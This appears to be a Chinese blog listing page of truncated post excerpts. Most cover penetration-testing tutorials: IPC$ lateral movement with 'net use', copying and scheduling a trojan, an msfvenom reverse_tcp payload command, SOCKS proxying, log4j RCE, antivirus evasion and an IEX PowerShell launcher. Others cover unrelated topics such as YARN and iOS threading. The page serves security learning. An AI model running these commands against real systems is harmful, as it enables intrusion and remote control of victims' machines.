域渗透对于初学者来说，主要难点在于涉及域的基础理论知识较多，比如ACL访问控制、DcSync权限、黄金票据、白银票据、Access Token、哈希传递等等。 ACL–访问控制列表 访问控制列表(ACL)是应用在路由器接口的指令列表(即规则)。指令列表用来告诉路由器&…

0x01-前言 昨晚爆出的log4j rce 是通过lookup触发的漏洞，但jdk1.8.191以上默认不支持ldap协议，对于高版本jdk,则需要一定的依赖。不过为了给大家最简单的说明，我这里还是用jdk1.8.144的版本来运行。 0x02-靶场搭建 docker 搭建方式 docke…

1、前言 看雪安全接入（KSA），一款傻瓜式的一键接入私有网络的工具，无论您在任何地点、任何时间、使用任何线路，均可利用这一服务接入自己的私有设备。 KSA的服务端和客户端集成在一个可执行文件之中，目前支…

0x01 前言 相信准备学习内网渗透的人，都会知道有黄金票据这个事情，而黄金票据的原理是和攻击方式，网站说的都一大堆概念，很难懂，这里我说声明一下，黄金票据的作用在于做权限维持 ，原理在于域服…

0x01 条件 1、我们获取到目标主机管理员账号密码，并且目标主机的 139，445端口是开启的， 0x02 建立ipc协议拷贝cs木马 这时候， 我们可以先建立ips 协议， net use \ip\ipc$ 密码 /user:账号 例子 net use \\192.168.93…

0x01 前言 1\当我们建立完ipc连接 shell net use \\192.168.138.138\ipc$ "dc123.com" /user:administrator2、查看连接 3、用命令copy 木马过去 shell copy C:\phpStudy\PHPTutorial\WWW\public\nw.exe \\192.168.138.138\c$4、用 at \192.168.138.138 16:53:11 …

0x01 前言 在攻防演练时，当我们拿下主机时，我们要开始对内网进行渗透，常见的手法有，frp，ew，等代理工具，这里我介绍一个工具 msf 模块中的socket 4a代理工具,这里我使用的是msf 5的版本&#xf…

0x01 前言 这几天我的msf 要生成linux 的木马 一直反弹不成功，用的是以下的paylaod msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST192.168.233.131 LPORT4444 -f elf > mshell.elf 我分析了一下报错，这个报错是没问题的，但生成的…

一、免杀思路 应该说每一类型的恶意软件所实施的反检测技术都是不一样的（恶意软件可以分为病毒、木马、僵尸程序、流氓软件、勒索软件、广告程序等），虽然本文会对所有相关的反检测技术都进行介绍，但我们还是会将注意力放在stager…

0x01 前言 当我们进内网的的时候，会遇到永恒之蓝这种漏洞，之前不懂代理的时候，总是不找到怎么利用，等到我学会了流量代理，frp等工具，才慢慢理解各种协议，各种流量方式的通信方式。 初级–》frp…

0x01前言 当我们要上线主机的时候，可能会因为你的代码含有木马字符串，导致无法上线 0x02问题 1、 例子 powershell.exe -exec bypass -encodedCommand ZQBjAGgAbwAgACIAMQAyADMAIgA 2、原句子 powershell.exe -nop -w hidden -c "IEX ((new-objec…

一、前提 drozer是一款针对Android系统的安全测试框架，可以分成两个部分：其一是apk文件客户端，它运行在本地计算机上；其二是msi文件服务端，然后进行连接。 在官网下载drozer.msi安装到电脑，drozer.apk装到…

一、前言 本文将从八个方面阐述，分别是：应急响应的整体思路、应急响应的基本流程、应急工具集简介、系统日志及日志分析、威胁情报的作用、常见病毒及分类、理解漏洞和补丁、技能提升建议。 2022年信息安全事件频发，信息安全的技能、人才需…

1、前言 ①、相信大家应该听说过ai绘图，就是通过一些文字描写，去绘制你想要的图片。 ②、因为这里用到的是白嫖colab谷歌服务器无需本地显卡，所以需要能访问谷歌的代理。 2、实现 https://colab.research.google.com/drive/1_Ma71L6uGbtt…

问题呈现 打开WiFi，查看流量使用情况。 发现最近30天qq音乐使用了大量的流量 打开360的流量监视器，发现上传流量比下载流量都多。 原理讲解 市面上几乎所有的影视音乐软件都会使用这种p2p技术节约自身服务器带宽成本。 就是把你的歌曲下载到你的电脑…

账号：username 密码：axqsn

联想小新电脑，遇到电脑黑屏。 解决方法，搜索打开任务管理器 打开联想管家的路径 打开BatterySetting.exe 程序 然后右下角会弹出一个东西，关闭这个摄像头的隐私模式。就可以打开了 就可以了

获得更多单片机以及c相关的资料以及源代码例程，请私信回复 “单片机” 一，键盘接口的设计需要解决的问题 需要判断是否有按键按下，如果有，那么进入下一个动作。识别是哪一个按键被按下？并求出相应的键值。根据键值找到相应的按键处理程序入口即可。按键可以分为(独立按键，…

我们知道在iOS开发中，一共有四种多线程技术：pthread，NSThread，GCD，NSOperation： - 前两者是面向线程开发的多线程技术，需要开发者自己去维护线程的生命周期，比较繁琐。 - 后两者是…

YARN是Hadoop新版中的资源控制框架。本文旨在深入剖析ResourceManager的调度器，探讨三种调度器的设计侧重，最后给出一些配置建议和参数解释。 本文分析基于CDH4.2.1。调度器这个部分目前还在快速变化之中。例如，CPU资源分配等特性在不就的将来…